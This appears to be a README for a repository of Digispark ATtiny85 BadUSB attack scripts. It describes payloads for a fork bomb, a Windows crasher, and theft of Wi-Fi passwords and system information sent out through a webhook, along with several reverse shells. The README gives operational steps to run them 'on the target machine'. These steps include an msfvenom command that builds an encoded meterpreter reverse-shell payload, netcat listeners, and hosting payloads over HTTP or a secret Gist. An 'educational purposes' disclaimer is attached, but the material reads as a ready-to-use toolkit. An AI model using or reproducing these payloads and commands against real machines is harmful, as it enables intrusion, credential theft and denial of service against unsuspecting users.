This repository is dedicated to storing scripts for the Digispark Attiny85 while promoting knowledge sharing. The scripts will be updated over time as I gain more experience! 😊
⚠ Disclaimer: These scripts are for educational purposes only. Use them at your own risk!
✅ Compatible with Windows, Linux, and Termux!
- Fakeupdate 🃏 - Displays a fake Windows update screen.
- ForkBomb 💥 - Creates an infinite loop, causing a system crash.
- Grab-WindowsSysinfo 👽 - Collects system information.
- Metasploit-Revshell 💔 - Reverse shell using Metasploit.
- Netcat-Revshell 🐱 - Reverse shell using Netcat.
- Revshell-ps1 🐀 - PowerShell-based reverse shell.
- Steal-Wifi-Passwd 😈 - Extracts saved Wi-Fi passwords.
- Wallpaper-Prank 😵 - Changes desktop wallpaper and hides icons.
- Windows-Crasher 💥 - Creates a batch payload to crash Windows.
To use these scripts, install the following:
- Digistump Packages: DigistumpArduino
- Digispark ABNT2: DigisparkABNT2
- Arduino IDE: Download here
- Metasploit Framework: Metasploit Website
This script opens a fake Windows update website in full screen.
Steps:
- Upload the "Fakeupdate" script to Digispark.
- Run it on the target machine.
This script runs an infinite loop until the system crashes.
Steps:
- Upload the "ForkBomb" script to Digispark.
- Run it on the target machine.
This script extracts system information and sends it via a webhook.
Steps:
- Replace the webhook URL in the script.
- Upload the "Grab-WindowsSysinfo" script to Digispark.
- Run it on the target machine.
This script creates a Metasploit reverse shell.
Steps:
- Generate a payload:
msfvenom --platform windows -p windows/meterpreter/reverse_tcp lhost=YOUR_IP lport=443 -e x86/shikata_ga_nai -i 7 -f exe -o exploit.exe
- Edit
meta.rc
and start Metasploit:msfdb reinit && msfconsole -r meta.rc
- Host the file:
python3 -m http.server 80
- Upload the "Metasploit-Revshell" script to Digispark and execute it.
This script establishes a reverse shell using Netcat.
Steps:
- Start an HTTP server:
python3 -m http.server 80
- Listen for the connection:
nc -lvnp 443 # Or use ncat/pwncat-cs
- Upload and run the "Netcat-Revshell" script.
This PowerShell script creates a reverse shell.
Steps:
- Upload the .ps1 script to a secret GitHub Gist.
- Copy the raw link into the Arduino IDE.
- Listen for the connection:
nc -lvnp 443 # Or use ncat/pwncat-cs
- Upload and run the "Revshell-ps1" script.
This script extracts saved Wi-Fi passwords and sends them via a webhook.
Steps:
- Replace the webhook URL in the script.
- Upload and run the "Steal-Wifi-Passwd" script.
This script takes a screenshot of the desktop, sets it as the wallpaper, and hides icons.
Steps:
- Upload and run the "Wallpaper-Prank" script.
This script generates a batch file to crash Windows.
Steps:
- Upload and run the "Windows-Crasher" script.
Enjoy experimenting responsibly! 😈